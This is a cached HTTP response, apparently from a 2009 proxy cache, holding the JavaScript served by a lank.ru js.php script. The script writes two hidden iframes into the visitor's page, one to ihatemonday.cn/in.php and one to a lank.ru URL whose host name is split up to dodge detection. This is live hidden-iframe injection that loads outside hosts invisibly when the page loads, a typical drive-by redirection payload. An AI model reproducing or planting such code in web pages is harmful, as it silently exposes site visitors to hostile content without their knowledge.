HTTP/1.1 200 OK
Content-Length: 240
Date: Mon, 16 Mar 2009 08:23:35 GMT
Last-Modified: Mon, 16 Mar 2009 08:23:35 GMT
Cache-Control: must-revalidate
Server: nginx/0.5.35
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/5.2.5
Pragma: no-cache
X-Polipo-Location: http://lank.ru/js.php?id=1923&url=http%3A%2F%2Finbux.info%2F&ref=&ok=1&rnd=0.29519964135669013
X-Polipo-Date: Mon, 16 Mar 2009 08:28:10 GMT
X-Polipo-Access: Mon, 16 Mar 2009 08:28:11 GMT


document.write("<iframe src='http://ihatemonday.cn/in.php?donate' style='display:none;'></iframe>");
document.write("<iframe src='http://la"+"nk.ru/js5.php?id=172455&rnd=d39465e5ec5c4d1a1903cf4e7476fec6' style='display:none;'></iframe>")
